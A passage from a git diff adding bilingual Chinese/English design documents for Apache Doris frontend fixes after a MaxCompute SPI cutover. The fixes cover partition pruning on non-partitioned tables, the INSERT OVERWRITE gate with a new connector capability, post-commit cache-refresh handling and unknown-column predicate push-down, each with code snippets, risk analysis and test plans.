自身注释声明一致。**Rule 2/3 取舍 → 只做 Option A**(不加冗余 guard;若 impl-review 认为 data-loss 路径值得 defense-in-depth 再议)。 + +**被否方案**: +- Option C(改 `PruneFileScanPartition` else 支返 NOT_PRUNED):该 else 支是**通用**(所有 file-scan 表 supportInternalPartitionPruned=false 时走)→ 动 HMS/Iceberg 等,blast radius 过大,违 Rule 3。 +- 改 `resolveRequiredPartitions` 把空 list 当 null:会破坏「分区表真裁剪到 0 分区 → 0 行」的 P1-4 正确语义(`WHERE pt='不存在'` 应返 0 行)。否。 + +## Implementation Plan(折入设计验证 mustFix/shouldFix) + +1. **Fix(一行)**:`PluginDrivenExternalTable.supportInternalPartitionPruned()` 改返无条件 `true`;改写误导注释(:206-211)——新不变式=无条件 true 镜像 legacy `MaxComputeExternalTable`;为何对非分区安全=`PruneFileScanPartition` 走 IF 支 → `pruneExternalPartitions:78` 见空分区列返 `NOT_PRUNED`(**不**走 else 支的 isPruned=true+空 → 不会触发 `PluginDrivenScanNode` 0-split 短路 → 不丢行)。 +2. **【mustFix,设计验证 Lens-2】翻转钉错不变式的现有测**:`PluginDrivenExternalTablePartitionTest.testNonPartitionedTableReportsNoPartitionsAndNoPruning:98` 现 `assertFalse(supportInternalPartitionPruned())`(WHY 注释 :95-97 明文为 buggy 值辩护「must NOT opt into pruning」「mutation→true makes red」)。**改为 `assertTrue(...)` + 重写 WHY**:非分区表必须 opt-in 才能让 PruneFileScanPartition 走 NOT_PRUNED 安全支、避免 else 支 isPruned=true+空 → 静默 0 行的 data-loss 链。**此翻转本身即 repro**(修前该断言对现 false 为绿、对 fix 后 true 为红——即它当前钉住 bug;翻转后 mutation 还原 fix→红)。 +3. **【test-adequacy,设计验证 Lens-3】repro 主用轻量单测、不强求全 rule-transform**:决定性 bug 面是单方法 `supportInternalPartitionPruned`。step-2 的翻转断言(非分区→true)即**主 repro**(buildable=复用 `tableWithCacheValue` 既有 harness:250-270,非空依赖;非真空=mutation 还原即红)。`PruneFileScanPartition.build().transform(...)` 全链路需真 `CascadesContext`、fe-core 无既有 pattern 可抄 → **不作主测**(可选:若 `PlanChecker`/`MemoTestUtils` 能轻量驱动则补一条「非分区+filter→scan-all」集成测,否则归 e2e/DV)。 +4. **保留 helper 契约测 + 加注释**:`PluginDrivenScanNodePartitionPruningTest:92-100` 的 `emptyPruned→空 list` 测**保留**(契约对**真分区**表裁剪到 0 正确),加注释澄清「此态只应来自真分区表裁剪;非分区表经 Option A 永不到此(否则 0 行 data-loss)」+ 指向 step-2。 +5. **真值闸 e2e(CI 跳)**:`regression-test/suites/.../test_mc_nonpartitioned_filter.groovy` 非分区 MC 表 `SELECT ... WHERE` 返正确非空行集。 + +## Risk Analysis + +| Risk | Mitigation | +|---|---| +| 改 true 影响 `QueryPartitionCollector`/`PartitionCompensator` 对非分区 PluginDriven 表 | 设计验证核这两 consumer 在非分区(空分区列)下为 no-op;UT 守 + 无 MV-on-MC 既有用例回归。 | +| 改 true 误伤别的 PluginDriven 文件连接器(Hudi-SPI) | Hudi-SPI DV-006 deferred/未 wire;且 true 对非分区任何连接器都正确(pruneExternalPartitions 自处理)。 | +| repro 测 harness 过重/不可建 | 退化为最小集成测(构造非分区 PluginDriven LogicalFileScan 直跑规则);至少钉「rule 后 resolveRequiredPartitions==null」。 | +| 分区表回归 | true vs 现状对分区表零差异;既有 `PluginDrivenScanNodePartitionPruningTest` + p2 `test_max_compute_partition_prune` 守。 | + +## Test Plan + +### Unit Tests +- **新增 repro**(fe-core):非分区 PluginDriven 表 + filter 经 `PruneFileScanPartition` → `resolveRequiredPartitions(scan.selectedPartitions) == null`。先红后绿。 +- **mutation**:把 fix 还原(true→`!isEmpty()`)须令 repro 测变红。 +- 既有 `PluginDrivenScanNodePartitionPruningTest` 全绿(helper 契约不变)。 + +### E2E Tests(CI 跳,真实 ODPS = 真值闸) +- 非分区 MC 表 `SELECT ... WHERE <谓词>` 返回**正确非空行集**(修前 0 行)。归入 DV 真值闸(live ODPS)。 +- **实现分歧(impl-review 记,非缺陷)**:未新建 `test_mc_nonpartitioned_filter.groovy`,改**扩既有 `test_max_compute_partition_prune.groovy`**——更优:复用 `enable_profile×num_partitions×cross_partition` 矩阵,非分区案例在全模式下被覆盖。加 `no_partition_tb`(id 1..5) DDL 入 seed 注释块 + 直接 `assertEquals` 行数断言(WHERE id=5→1 行 / id>=3→3 行 / full→5 行;无 .out 依赖;gated on enableMaxComputeTest)。**需用户在 ODPS `mc_datalake` 建 `no_partition_tb` 后 live 跑** = DV-021。 + +## 守门结果(DONE) +编译 BUILD SUCCESS;UT 6/6+5/5 绿;mutation 还原 fix→repro 红→恢复绿;checkstyle 0;import-gate exit 0。设计验证 `wijd3qgk0`(4 lens 全 design-sound,1mF+3sF 折入) + impl-review `wza2khdb2`(2 lens approve,0mF,2 nit 修)。详见 `plan-doc/reviews/P4-T06e-FIX-NONPART-PRUNE-DATALOSS-review-rounds.md`。 + +## 决策类型 +明确修复(用户定 Fix,repro 先行)。连接器无关、纯 fe-core 通用插件层、无 SPI 变更。 diff --git a/plan-doc/tasks/designs/P4-T06e-FIX-OVERWRITE-GATE-design.md b/plan-doc/tasks/designs/P4-T06e-FIX-OVERWRITE-GATE-design.md new file mode 100644 index 00000000000000..cc185ebfe2d1f8 --- /dev/null +++ b/plan-doc/tasks/designs/P4-T06e-FIX-OVERWRITE-GATE-design.md @@ -0,0 +1,330 @@ +# FIX-OVERWRITE-GATE (P4-T06e) — design + +> 7th cutover-fix. Scope: fe-core only. Single-gate change. Surgical (Rule 3). +> Source: clean-room re-review NG-1 (`plan-doc/reviews/P4-maxcompute-full-rereview-2026-06-07.md`, +> §NG-1 / §C domain-6 / §E). High confidence; live e2e is the real truth-gate. + +## Problem + +After the MaxCompute SPI cutover, a MaxCompute table is a `PluginDrivenExternalTable` +(`TableType.PLUGIN_EXTERNAL_TABLE`). `INSERT OVERWRITE` into such a table is rejected before any +write work begins, by the gate in `InsertOverwriteTableCommand`. + +Current gate (`InsertOverwriteTableCommand.java:315-323`): + +```java +private boolean allowInsertOverwrite(TableIf targetTable) { + if (targetTable instanceof OlapTable || targetTable instanceof RemoteDorisExternalTable) { + return true; + } else { + return targetTable instanceof HMSExternalTable + || targetTable instanceof IcebergExternalTable + || targetTable instanceof MaxComputeExternalTable; + } +} +``` + +Caller (`InsertOverwriteTableCommand.java:142-148`): + +```java +// check allow insert overwrite +if (!allowInsertOverwrite(targetTableIf)) { + String errMsg = "insert into overwrite only support OLAP/Remote OLAP and HMS/ICEBERG table." + + " But current table type is " + targetTableIf.getType(); + LOG.error(errMsg); + throw new AnalysisException(errMsg); +} +``` + +`PluginDrivenExternalTable` matches none of the listed types, so `run()` throws: + +``` +AnalysisException: insert into overwrite only support OLAP/Remote OLAP and HMS/ICEBERG table. +But current table type is PLUGIN_EXTERNAL_TABLE +``` + +(`targetTableIf.getType()` for a `PluginDrivenExternalTable` is `PLUGIN_EXTERNAL_TABLE`, set in its +ctor `PluginDrivenExternalTable.java:71` — verified.) + +`cutover↔legacy`: legacy `MaxComputeExternalTable` matched the last `instanceof` and passed the gate, +so `INSERT OVERWRITE` executed. Post-cutover the same command throws before reaching the (fully +wired) write machinery. + +## Root Cause + +`allowInsertOverwrite` is a pure `instanceof` allow-list of *legacy* table classes. The cutover +replaced the concrete `MaxComputeExternalTable` with the generic `PluginDrivenExternalTable`, but +this gate was never extended to recognise the generic SPI table type. The lower OVERWRITE machinery +*was* extended (it already has a `UnboundConnectorTableSink` branch — see below), so this is a +classic "dispatch only half-wired": the entry gate rejects what the body already supports. + +### The lower machinery is already complete (one-gate change confirmed) + +Once the gate passes, the path is fully wired for the plugin/connector case: + +1. `run()` (`:157-160`) calls `InsertUtils.normalizePlan(...)`. For a `PluginDrivenExternalCatalog`, + the parsed `INSERT OVERWRITE` plan is an `UnboundConnectorTableSink` + (`UnboundTableSinkCreator.java:68-69, :108-110, :149-151` all map + `curCatalog instanceof PluginDrivenExternalCatalog` → `UnboundConnectorTableSink`; + `InsertUtils.normalizePlan` handles it at `InsertUtils.java:609-610`). +2. The non-OLAP branch at `run()` `:215-218` sets `partitionNames = []` (FE does not create temp + partitions for external tables), and the flow enters `insertIntoPartitions(...)` via `:241-279`. +3. `insertIntoPartitions` (`:345-444`) dispatches on the sink type. The + `UnboundConnectorTableSink` branch (`:420-440`) rebuilds the sink, creates a + `PluginDrivenInsertCommandContext`, sets `overwrite=true`, and copies the static-partition spec + from `sink.getStaticPartitionKeyValues()`. This is the genuine OVERWRITE wiring — it just is + never reached today. + +So the fix is a single gate edit. No change to the body, the sink, the context, or the translator. + +## Design + +### The change + +Add a `PluginDrivenExternalTable` branch to `allowInsertOverwrite`: + +```java +private boolean allowInsertOverwrite(TableIf targetTable) { + if (targetTable instanceof OlapTable || targetTable instanceof RemoteDorisExternalTable) { + return true; + } else { + return targetTable instanceof HMSExternalTable + || targetTable instanceof IcebergExternalTable + || targetTable instanceof MaxComputeExternalTable + || targetTable instanceof PluginDrivenExternalTable; + } +} +``` + +### Predicate choice — `instanceof PluginDrivenExternalTable` (Rule 7, Rule 2) + +The re-review (§NG-1 处置) phrased the predicate as "key on the SPI generic type; whether OVERWRITE +is supported is decided by whether downstream produces an `UnboundConnectorTableSink`." Examining the +actual code, those two phrasings collapse to the *same* predicate: + +- `UnboundTableSinkCreator` produces an `UnboundConnectorTableSink` **iff** + `curCatalog instanceof PluginDrivenExternalCatalog` (`:68`, `:108`, `:149`) — there is **no** + capability flag or table-level toggle in that decision. +- A `PluginDrivenExternalTable` always belongs to a `PluginDrivenExternalCatalog` (its ctor and all + metadata accessors cast `catalog` to `PluginDrivenExternalCatalog`). +- Therefore "table is `PluginDrivenExternalTable`" ⇔ "downstream produces `UnboundConnectorTableSink`" + ⇔ "the `:420-440` OVERWRITE branch will fire". The `instanceof` is the faithful, minimal encoding + of the report's "downstream produces UnboundConnectorTableSink" criterion. + +**Alternative considered — capability-gated** (`ConnectorCapability.SUPPORTS_INSERT`): +`ConnectorCapability` already exists and has `SUPPORTS_INSERT` (`ConnectorCapability.java:30`), and +`PluginDrivenExternalTable.supportsParallelWrite()` (`:78-85`) shows the established pattern for +reading capabilities. We could gate the branch on +`((PluginDrivenExternalCatalog) catalog).getConnector().getCapabilities().contains(SUPPORTS_INSERT)`. + +Rejected for this fix, because: +1. **It would not match the current contract.** No other downstream component (the sink creator, the + BindSink connector branch, `InsertUtils`) consults `SUPPORTS_INSERT` before producing/binding a + connector sink. Gating *only* the OVERWRITE gate on the capability would make OVERWRITE stricter + than plain INSERT, which is inconsistent and surprising. A capability check, if wanted, belongs in + the sink-creation layer (`UnboundTableSinkCreator`) so that INSERT and OVERWRITE share it — that + is a separate, broader change, out of scope for a regression fix. +2. **Rule 2 (simplicity) / Rule 11 (match conventions).** Every other arm of `allowInsertOverwrite` + is a bare `instanceof` (OlapTable / RemoteDoris / HMS / Iceberg / MaxCompute — `:316-321`); none + gates on a capability or write-support flag. A bare `instanceof PluginDrivenExternalTable` matches + the surrounding style exactly. If the underlying connector genuinely cannot write, the failure + surfaces deterministically deeper in the write path (BE / connector sink), exactly as it would for + plain INSERT today — the gate is not the right place to pre-empt that. +3. **The report's literal criterion is the `UnboundConnectorTableSink`, not a capability** — and that + is what `instanceof PluginDrivenExternalTable` encodes (see above equivalence). + +**Recommendation:** `instanceof PluginDrivenExternalTable`. This is the simplest predicate that is +*correct against the actual downstream dispatch* and consistent with both the existing arms of this +method and the FIX-PART-GATES decision① principle ("key on the SPI type, do not over-broaden"). Note +the contrast with FIX-PART-GATES decision①: there the override was *shared* by jdbc/es/trino/MC, so +an unconditional `true` would have flipped non-MC behavior, and the predicate had to be narrowed +(`!getPartitionColumns().isEmpty()`). Here the predicate already *is* type-scoped — `instanceof +PluginDrivenExternalTable` only fires for plugin tables — and the downstream is uniformly wired for +all of them, so no further narrowing is warranted or beneficial. + +### Shared-override / blast-radius note (jdbc/es/trino) + +`allowInsertOverwrite` is **not** an override shared across table classes — it is a private method of +`InsertOverwriteTableCommand` keyed on `instanceof`. Adding the branch only changes behavior for +tables that are `PluginDrivenExternalTable` (jdbc, es, trino-connector, max_compute after cutover). +For jdbc/es/trino this *enables* the OVERWRITE entry gate where it was previously rejected — but the +downstream is identical for all of them: they all flow through the same `UnboundConnectorTableSink` → +`PluginDrivenInsertCommandContext(overwrite=true)` branch (`:420-440`). If a given connector cannot +actually perform an overwrite, it fails at the connector/BE write layer with a connector-specific +error, exactly as a plain INSERT into a write-incapable connector does today. The gate is not the +behavioral firewall for "can this connector write" — the connector itself is. This is the same +semantics legacy had: legacy gated only on `instanceof MaxComputeExternalTable` because MC was the +only connector-style table; the generic replacement is `instanceof PluginDrivenExternalTable`. + +## Implementation Plan + +**File:** `fe/fe-core/src/main/java/org/apache/doris/nereids/trees/plans/commands/insert/InsertOverwriteTableCommand.java` + +**Method:** `allowInsertOverwrite(TableIf)` (`:315-323`). + +**Edit** — append one `instanceof` arm to the `else` return (`:319-321`): + +```java + return targetTable instanceof HMSExternalTable + || targetTable instanceof IcebergExternalTable + || targetTable instanceof MaxComputeExternalTable + || targetTable instanceof PluginDrivenExternalTable; +``` + +**Import to add:** +`import org.apache.doris.datasource.PluginDrivenExternalTable;` + +**Import placement / checkstyle (CustomImportOrder: doris → third-party → java; UnusedImports; +LineLength 120):** the new import is in the `org.apache.doris.datasource.*` block. The existing block +(`:29-33`) is: + +``` +import org.apache.doris.datasource.doris.RemoteDorisExternalTable; +import org.apache.doris.datasource.doris.RemoteOlapTable; +import org.apache.doris.datasource.hive.HMSExternalTable; +import org.apache.doris.datasource.iceberg.IcebergExternalTable; +import org.apache.doris.datasource.maxcompute.MaxComputeExternalTable; +``` + +`org.apache.doris.datasource.PluginDrivenExternalTable` (package `datasource`, no sub-package) sorts +*before* `org.apache.doris.datasource.doris.RemoteDorisExternalTable` lexicographically (`.P` < +`.doris` — uppercase ASCII before lowercase). Insert it as the **first** line of that block, i.e. +immediately before `:29`. (Confirm against `checkstyle:check`; if the project's import comparator is +case-insensitive the line may instead sort after the `maxcompute` line — let checkstyle dictate the +exact slot.) + +No other edits. The branch body and all downstream wiring are unchanged. + +## Risk Analysis + +- **Blast radius — non-MC plugin connectors (jdbc/es/trino):** This change lets jdbc/es/trino-backed + `PluginDrivenExternalTable`s pass the OVERWRITE *entry* gate. Pre-cutover those were legacy + `JdbcExternalTable` / `EsExternalTable` / `TrinoConnectorExternalTable`, which were **never** in + `allowInsertOverwrite` — so for them this is a *new* code path being opened, not a parity + restoration. Mitigation/justification: the downstream is uniform (all plugin catalogs produce + `UnboundConnectorTableSink`), and a connector that cannot overwrite fails deterministically at the + bind/BE layer with a connector-specific error — the same place plain INSERT fails for a + write-incapable connector. The gate is intentionally not the per-connector write-capability check. + If product wants OVERWRITE locked down per-connector, that belongs in `UnboundTableSinkCreator` + (shared by INSERT + OVERWRITE), not here — flagged, out of scope. +- **Batch-D red-line interaction (🔴):** Batch-D plans to delete the legacy + `instanceof MaxComputeExternalTable` arm (`:321`) from this method + (`P4-batchD-maxcompute-removal-design.md` §2, file row for `InsertOverwriteTableCommand.java`). + That deletion is safe **only after** this fix adds the `PluginDrivenExternalTable` arm — otherwise + the gate loses *all* coverage for MaxCompute tables (legacy class is gone post-cutover anyway, and + the generic arm would not yet exist) and `INSERT OVERWRITE` breaks permanently. Ordering: this fix + must land *before* the Batch-D delete-branch edit for `:321`. **Doc-sync flag below.** +- **What can still fail at BE/live (real truth-gate):** This fix only proves the FE entry gate is + passable. The actual OVERWRITE execution (static-partition spec honored, partition replace + semantics, affected-rows, MC `INSERT OVERWRITE` vs `INSERT INTO ... OVERWRITE` mapping) is BE + + connector + ODPS, and per the re-review (§NG-1 note, §E#5/#6) the truth-gate is **live e2e against + real ODPS, which CI skips**. The re-review also flags adjacent write blockers (NG-2/NG-4 dynamic + partition GATHER/local-sort, NG-3 static-partition bind) that this fix does *not* address — a green + gate here does not imply a green end-to-end OVERWRITE until those are fixed and run live. + This fix is necessary-but-not-sufficient for working OVERWRITE; it removes the first (FE) blocker. + +## Test Plan + +### Unit Tests + +**Location:** new test class +`fe/fe-core/src/test/java/org/apache/doris/nereids/trees/plans/commands/insert/InsertOverwriteTableCommandTest.java` +(no existing unit test targets `allowInsertOverwrite` — verified; this is the package home of the +command under test). + +`allowInsertOverwrite(TableIf)` is `private` and field-independent (it inspects only its argument), +so invoke it directly via the project's established private-method test helper +`org.apache.doris.common.jmockit.Deencapsulation.invoke(instance, "allowInsertOverwrite", table)` +(pattern: `transaction/TableStreamOffsetTransactionTest.java:112`). Construct the command with any +minimal `LogicalPlan` (the ctor only requires a non-null `logicalQuery`; `allowInsertOverwrite` never +touches it — use a mock/stub `LogicalPlan` or a trivial unbound sink). Build the +`PluginDrivenExternalTable` with the mock-catalog pattern from +`PluginDrivenExternalTablePartitionTest` (`TestablePluginCatalog("max_compute", ...)` + a +`PluginDrivenExternalTable` anonymous subclass that no-ops `makeSureInitialized()`), so no Doris env +is required. + +**Test 1 — `allowInsertOverwriteAcceptsPluginDrivenTable` (the Rule-9 red-before / green-after test):** +- Arrange: a `PluginDrivenExternalTable` backed by a `max_compute` `TestablePluginCatalog`. +- Act: `boolean allowed = Deencapsulation.invoke(cmd, "allowInsertOverwrite", table);` +- Assert: `assertTrue(allowed, "INSERT OVERWRITE into a cutover MaxCompute (PluginDrivenExternalTable) must pass the gate; legacy MaxComputeExternalTable did")`. +- **Why it encodes intent (Rule 9):** it asserts the *business* invariant "cutover MaxCompute tables + retain INSERT OVERWRITE support that legacy had" — not merely "method returns a boolean". +- **Mutation / red-before proof:** remove the new `|| targetTable instanceof PluginDrivenExternalTable` + arm (i.e. revert the production change) → `allowInsertOverwrite` returns `false` for a + `PluginDrivenExternalTable` → this assertion goes **red**. With the arm present it is green. This is + the loop's red-before/green-after gate. + +**Test 2 (optional parity guard) — `allowInsertOverwriteStillRejectsUnsupportedType`:** +- Arrange: a `TableIf` that is none of the allow-listed types (e.g. a mock `TableIf`, or any + internal table type not in the list). +- Assert: `assertFalse(...)`. +- **Why:** pins that the new arm did not accidentally broaden to "all external tables" — a mutation + that replaced the targeted `instanceof` with an unconditional `true` would make this red. Keeps the + predicate honest (Rule 9 — the test can fail if the gate logic is loosened). + +**Optional integration-style assertion (only if cheap):** if a `run()`-level test can be stood up +that asserts the *exact pre-fix exception message* +(`"...But current table type is PLUGIN_EXTERNAL_TABLE"`) is **no longer thrown** for a plugin table, +it documents the user-visible symptom. This is heavier (needs more of `run()`'s collaborators) and is +not required — Test 1 already gives the deterministic red-before/green-after gate. Prefer Test 1 + +Test 2 for the loop. + +**Out of scope for this loop (state explicitly):** end-to-end `INSERT OVERWRITE` execution against +real ODPS (`external_table_p2/maxcompute/*`). Per §Risk, that is the real truth-gate but requires +live credentials and is CI-skipped; it is not part of this fix's unit-test loop. + +--- + +# Round 2 revision (2026-06-07) — narrow predicate via SPI capability (user decision = Option A) + +**Why revised:** round-1 clean-room adversarial review (`w5ke8sjaq`) confirmed (2/2) that the bare +`instanceof PluginDrivenExternalTable` predicate also admits **JDBC** (which is `PluginDrivenExternalTable` +post-cutover, `supportsInsert()=true` but `getWriteConfig` never propagates the overwrite flag) → +`INSERT OVERWRITE` **silently degrades to a plain INSERT (data loss)**. Before this fix JDBC overwrite +failed *loud* (rejected at the gate); the bare predicate makes the silent-loss path newly reachable — +a regression this fix introduces, forbidden by Rule 12. ES/Trino (`supportsInsert()=false`) are not a +data bug (they already fail loud downstream) but are also newly admitted then fail with a *generic* +"does not support INSERT" message. The original design consciously deferred this ("the gate is not the +per-connector write firewall"); the review evidence + Rule 12 overrule that deferral. See +`plan-doc/reviews/P4-T06e-FIX-OVERWRITE-GATE-review-rounds.md` Round 1. + +**Decision (user, 2026-06-07): Option A — add an SPI capability.** Generic, SPI-aligned, fail-loud at +the gate for non-overwrite connectors, future connectors opt-in. + +**Changes:** +1. `ConnectorWriteOps.java` — add `default boolean supportsInsertOverwrite() { return false; }` right + after `supportsInsert()` (capability-query group). Default false = connectors that support plain + INSERT but not overwrite stay rejected, so callers fail loud instead of silently appending. +2. `MaxComputeConnectorMetadata.java` — `@Override public boolean supportsInsertOverwrite() { return true; }` + (MaxCompute genuinely honors overwrite: `MaxComputeWritePlanProvider:167` `builder.overwrite(true)`). +3. `InsertOverwriteTableCommand.java` — narrow the new arm to + `targetTable instanceof PluginDrivenExternalTable && pluginConnectorSupportsInsertOverwrite((PluginDrivenExternalTable) targetTable)`, + helper queries the connector capability via the established access pattern + (`catalog.getConnector().getMetadata(catalog.buildConnectorSession()).supportsInsertOverwrite()`, + mirroring `PhysicalPlanTranslator:657-686`). Extra import: `PluginDrivenExternalCatalog` (no + Connector/ConnectorMetadata/ConnectorSession imports — method-chained). Short-circuit `&&` means the + connector is only touched for PluginDriven tables (OlapTable etc. return early). +4. Error message (round-1 finding #3) — update the reject message so it is no longer misleading + (it omitted MaxCompute/plugin types). +5. Test (round-1 finding #4) — replace the tautological `mock(TableIf.class)`-only negative with a + concrete capability-gated suite: (a) overwrite-capable PluginDriven → allowed; (b) **non-overwrite-capable + PluginDriven (JDBC-like, `supportsInsertOverwrite()=false`) → rejected** (the regression guard; + mutation: drop `&& supportsInsertOverwrite` → returns true → red); (c) unsupported `TableIf` → rejected. + +**Blast radius after revision:** JDBC/ES/Trino now rejected AT the gate with a clear message (matches +legacy product behavior — none were ever in the overwrite allow-list), zero silent data loss; MaxCompute +restored to parity. The pre-existing JDBC `getWriteConfig` overwrite-flag gap is left for a separate +ticket (now unreachable for overwrite, so no live regression). + +--- + +# Outcome (2026-06-07) — DONE, 2 rounds + +Round-1 fix (bare `instanceof`) failed adversarial review (clean-room `w5ke8sjaq`): introduced a JDBC +silent overwrite→plain-INSERT data-loss path (Rule 12). Round-2 fix (Option A, SPI capability +`supportsInsertOverwrite()`) converged: round-2 review `wo81wbi7x` returned **0 surviving findings**, all +4 round-1 findings closed, test non-vacuous, no historical contradiction. fe-core + 2 connector modules +compile, UT 3/3, mutation-verified (revert→regression-guard test reds). See +`plan-doc/reviews/P4-T06e-FIX-OVERWRITE-GATE-review-rounds.md` for the full round log. +**Truth-gate remaining:** live `INSERT OVERWRITE` e2e against real ODPS (CI-skipped) + the adjacent +write blockers P0-2/P0-3. diff --git a/plan-doc/tasks/designs/P4-T06e-FIX-POSTCOMMIT-REFRESH-design.md b/plan-doc/tasks/designs/P4-T06e-FIX-POSTCOMMIT-REFRESH-design.md new file mode 100644 index 00000000000000..56889a25e11770 --- /dev/null +++ b/plan-doc/tasks/designs/P4-T06e-FIX-POSTCOMMIT-REFRESH-design.md @@ -0,0 +1,73 @@ +# FIX-POSTCOMMIT-REFRESH 设计(P3-12 / NG-8 / F15=F21) + +> 严重度:🟡 minor(regression=no)。处置:**无产线逻辑改动**——仅 Javadoc 泛化 + DV-018/D-034 登记。 +> 用户拍板(2026-06-08):**DV-018 + Javadoc 泛化**(不回退到 legacy 传播失败)。 +> 来源:`plan-doc/reviews/P4-maxcompute-full-rereview-2026-06-07.md` §A NG-8。 +> 实现 commit:`1f2e00d3696`(Javadoc + 本设计);账本回填 commit 见下一 doc-sync commit。 + +## Problem + +翻闸后 `PluginDrivenInsertExecutor.doAfterCommit()`(`:177-186`)用 try/catch 包 `super.doAfterCommit()`, +post-commit 缓存刷新失败时仅 log warning、INSERT 仍报成功;legacy `MCInsertExecutor` 不 override → +刷新异常向上传播 → INSERT 报 FAILED。这是**可观察的行为变更**且无书面登记,且现有 Javadoc(`:164-176`) +只为 JDBC_WRITE 路径辩护,没覆盖现在同一 executor 也走的 MC connector-transaction 路径。 + +## Root Cause + +`super.doAfterCommit()` = `BaseExternalTableInsertExecutor.doAfterCommit()`(`:133-140`) +→ `RefreshManager.handleRefreshTable(...)`(`RefreshManager.java:125-156`),它做三步且**全部在提交之后、纯 FE 侧**: +1. 校验 catalog/db/table 存在(不在抛 `DdlException`); +2. `refreshTableInternal(...)` 刷新 FE 本地 schema/row-count/分区缓存(`:152`); +3. `logRefreshExternalTable(...)` 写一条 external-table refresh editlog(`:155`),通知 follower 失效缓存。 + +按生命周期序(`BaseExternalTableInsertExecutor:118-124`):`doBeforeCommit → commit(远端数据持久)→ doAfterCommit`。 +即 `handleRefreshTable` 跑时数据已落 ODPS / 远端、FE 无法回滚;它**从不触碰已提交的远端数据**, +只动 FE 缓存与 follower 通知。故刷新失败 ⇒ 报 FAILED ⇒ 用户/pipeline 重试 ⇒ **重复写**—— +cutover 的「吞 + warn」反而更安全。 + +## Design + +不改任何产线逻辑(swallow 行为本身正确、对 JDBC 与 MC 两路径同样安全)。仅两件事: + +1. **Javadoc 泛化**(`PluginDrivenInsertExecutor.java:164-176`):把 swallow 理由从「只讲 JDBC_WRITE」 + 扩到覆盖 connector-transaction(MC) 路径,写明: + - 两路径在 doAfterCommit 时数据均已持久(JDBC=BE 直提 / MC=transaction manager onComplete 提交); + - `super.doAfterCommit()` 只刷 FE 缓存 + 写 refresh editlog、不碰远端数据; + - swallow 最坏只致**瞬时缓存 stale,自愈于下次 refresh/TTL**; + - 显式注明本行为**有意分歧于 legacy MCInsertExecutor**,引用 DV-018。 +2. **账本登记**:D-034(决策:接受更安全的 swallow、不回退)+ DV-018(偏差:行为分歧于 legacy,已登记)。 + +## Implementation Plan + +- 编辑 `PluginDrivenInsertExecutor.java:164-176` 的 Javadoc(注释 only,行宽 ≤120)。 +- 新增 `decisions-log.md` D-034、`deviations-log.md` DV-018(索引行 + 详细记录)。 +- 更新 `task-list-P4-rereview.md` P3-12 行 → DONE;`HANDOFF.md` 同步。 +- 守门:`-pl :fe-core checkstyle:check`(注释改动的唯一真实闸:行宽 / Javadoc 格式)+ `import-gate`。 + +## Risk Analysis + +- **零产线逻辑风险**:仅改注释,字节码不变。 +- **对抗性安全核查(已做)**:`handleRefreshTable` 写的 refresh editlog 只是 follower 缓存失效提示、 + 非数据真相源(ODPS 才是);master 在写 editlog(`:155`)前已先本地刷新(`:152`)。即便 editlog + 丢失,follower 最坏缓存暂 stale、到自身 TTL/下次 refresh 自愈,**无数据正确性损失、无主从分裂**。 +- **唯一被否决的替代**:回退到 legacy 传播失败 → 重新引入重复写隐患(review 判定更不安全)。 + +## Test Plan + +### Unit Tests + +无新增 UT。注释 only,无可被 mutation pin 的产线逻辑变化(与 P3-9/P3-10 不同——本项不动逻辑)。 +swallow 路径本身的覆盖现状:`doAfterCommit` 的 try/catch 由现有 executor 测路径间接覆盖; +异常吞行为的 offline 直测受同类 harness 缺位限制(连接器/外表 insert 无轻量 spy harness,见 [DV-015])。 + +### E2E Tests + +CI-skip(需真实 ODPS)。真值闸:在 MC INSERT 提交成功后人为令 refresh 失败(如并发 DROP CATALOG), +断言 INSERT 仍报 OK(非 FAILED)+ 日志含 stale-cache warning。归类于写路径 live e2e 套件,与 +DV-013/DV-014 写真值闸一并 live 验。 + +## 关联 + +- 决策 [D-034]、偏差 [DV-018] +- 复审 [§A NG-8](../../reviews/P4-maxcompute-full-rereview-2026-06-07.md) +- 同类 harness 缺位 [DV-015] diff --git a/plan-doc/tasks/designs/P4-T06e-FIX-PREDICATE-COLGUARD-design.md b/plan-doc/tasks/designs/P4-T06e-FIX-PREDICATE-COLGUARD-design.md new file mode 100644 index 00000000000000..42c0e521a5f5a4 --- /dev/null +++ b/plan-doc/tasks/designs/P4-T06e-FIX-PREDICATE-COLGUARD-design.md @@ -0,0 +1,90 @@ +# [P4-T06e] FIX-PREDICATE-COLGUARD (GAP2) — design + +> 来源:Batch-D 红线扩充对抗复审 workflow `wbw4xszrg`(GAP2,Tier 2,minor,**多半不可达**)。 +> 关联:legacy 对照 `MaxComputeScanNode.convertExprToOdpsPredicate`(未知列→`throw AnalysisException`)+ 其 caller loop(per-predicate `catch (Exception)`→丢该谓词);新路 `MaxComputePredicateConverter.formatLiteralValue`(odpsType==null→**静默引号化下推非法谓词**)。 + +## Problem + +翻闸后,谓词引用**表中不存在的列**时,新路把字面量**静默引号化并下推一条非法谓词到 ODPS**,而非像 legacy 那样丢弃该谓词。下推 `unknowncol == "v"` 给 ODPS 结果未定义(ODPS 可能报错,或更糟——按其语义返回错误行集 → 静默错结果)。 + +链(已核码,2026-06-08): +- `MaxComputePredicateConverter.formatLiteralValue:210-213`: + ```java + OdpsType odpsType = columnTypeMap.get(columnName); + if (odpsType == null) { + return " \"" + rawValue + "\" "; // ← 静默引号化,下推非法谓词 + } + ``` +- 调用链:`convertFilter`(`MaxComputeScanPlanProvider:273-298`) → `converter.convert(filter.get())`(`:297`) → `doConvert` → `convertComparison:141` / `convertIn:177` → `formatLiteralValue(columnName, ...)`。 +- `columnTypeMap` 由 `convertFilter:280-285` 从 ODPS 表 schema 的**数据列 + 分区列**构建。 + +## Root Cause(已核码确认) + +| # | 位置 | 现状 | legacy parity | +|---|---|---|---| +| 1 | `MaxComputePredicateConverter.formatLiteralValue:211-213` | `if (odpsType == null) return " \"" + rawValue + "\" ";`(静默引号化→下推非法谓词) | legacy `MaxComputeScanNode:~420/~484`:`if (!getColumnNameToOdpsColumn().containsKey(columnName)) throw new AnalysisException("Column ... not found ...")` → caller `:309-310` catch → **丢该谓词**(不下推) | + +**守卫反转**:legacy 用 `containsKey` 守卫、未知列**抛**→丢谓词;新路在 `get()==null` 时**反向**地静默接受、构非法串。本 issue = 把该 null 分支从「静默引号化」改为「抛」,使其经 `convert()` 的既有 catch 降级为 `Predicate.NO_PREDICATE`(= 不下推该过滤 = 丢谓词),恢复 legacy「不下推非法谓词」不变式。 + +**为何 CI 没抓 / 为何多半不可达**:`columnTypeMap` 覆盖表全部数据列+分区列;nereids/SPI 下达的 bound 